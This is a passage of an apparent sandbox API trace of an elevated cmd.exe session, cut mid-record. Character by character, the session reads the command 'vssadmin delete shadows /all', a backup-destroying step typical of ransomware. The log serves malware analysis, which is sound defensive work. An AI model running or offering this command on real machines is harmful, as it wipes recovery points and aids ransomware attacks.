returned 0x12c [0067.340] GetFileType (hFile=0x12c) returned 0x3 [0067.340] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0067.340] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f9c8, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f9c8*=0x2, lpOverlapped=0x0) returned 1 [0067.340] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x26f9f8 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0067.340] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.340] GetFileType (hFile=0x12c) returned 0x3 [0067.340] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0067.340] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x26f9c8, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f9c8*=0x3f, lpOverlapped=0x0) returned 1 [0067.340] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f9f8 | out: _Buffer="\r\n") returned 2 [0067.340] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.340] GetFileType (hFile=0x12c) returned 0x3 [0067.340] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.340] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0067.340] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f9c8, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f9c8*=0x2, lpOverlapped=0x0) returned 1 [0067.341] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0067.341] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0067.341] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0067.341] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0067.341] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.341] GetFileType (hFile=0x120) returned 0x3 [0067.341] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0067.342] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x26f820 | out: TokenHandle=0x26f820*=0x0) returned 0xc000007c [0067.342] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x26f820 | out: TokenHandle=0x26f820*=0x50) returned 0x0 [0067.342] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x26f830, TokenInformationLength=0x4, ReturnLength=0x26f838 | out: TokenInformation=0x26f830, ReturnLength=0x26f838) returned 0x0 [0067.342] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x26f838, TokenInformationLength=0x4, ReturnLength=0x26f830 | out: TokenInformation=0x26f838, ReturnLength=0x26f830) returned 0x0 [0067.342] NtClose (Handle=0x50) returned 0x0 [0067.342] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x26f800, nSize=0x0, Arguments=0x26f808 | out: lpBuffer="韠G") returned 0xf [0067.342] GetProcessHeap () returned 0x460000 [0067.342] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x218) returned 0x461ab0 [0067.342] GetConsoleTitleW (in: lpConsoleTitle=0x26f850, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.343] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0067.343] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0067.344] GetProcessHeap () returned 0x460000 [0067.344] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461ab0 | out: hHeap=0x460000) returned 1 [0067.344] LocalFree (hMem=0x4797e0) returned 0x0 [0067.345] GetProcessHeap () returned 0x460000 [0067.345] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47aa10 | out: hHeap=0x460000) returned 1 [0067.345] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f538 | out: _Buffer="\r\n") returned 2 [0067.345] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.345] GetFileType (hFile=0x12c) returned 0x3 [0067.345] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.345] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0067.345] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f508, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f508*=0x2, lpOverlapped=0x0) returned 1 [0067.345] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0067.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.345] _vsnwprintf (in: _Buffer=0x4a92eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f548 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0067.346] _vsnwprintf (in: _Buffer=0x4a92ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f548 | out: _Buffer=">") returned 1 [0067.346] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.346] GetFileType (hFile=0x12c) returned 0x3 [0067.346] _get_osfhandle (_FileHandle=1) returned 0x12c [0067.346] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0067.346] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x26f538, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f538*=0x26, lpOverlapped=0x0) returned 1 [0067.346] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.346] GetFileType (hFile=0x120) returned 0x3 [0067.346] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.346] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.346] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e320, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0067.348] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.348] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e322, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0067.348] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.348] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e324, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0067.348] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.348] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e326, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0067.348] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.348] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e328, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0067.348] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.348] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.349] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0067.349] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.349] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.349] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0067.349] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.349] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.349] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0067.349] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.349] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.349] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0067.349] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.349] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.349] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e332, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0067.350] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.350] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.350] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e334, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0067.350] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.350] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.350] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e336, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0067.350] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.350] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.350] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0067.350] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.350] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.350] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0067.350] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.350] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.351] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0067.351] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.351] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.351] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e33e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0067.351] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.351] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.351] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e340, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0067.351] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.351] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.351] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e342, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0067.351] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.351] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.351] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e344, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0067.351] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.352] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e346, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0067.352] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.352] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e348, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0067.352] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.352] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0067.352] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.352] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0067.352] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.354] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0067.354] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.354] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0067.355] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.355] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0067.355] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.355] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0067.355] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.355] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0067.355] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0067.355] _get_osfhandle (_FileHandle=0) returned 0x120 [0067.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 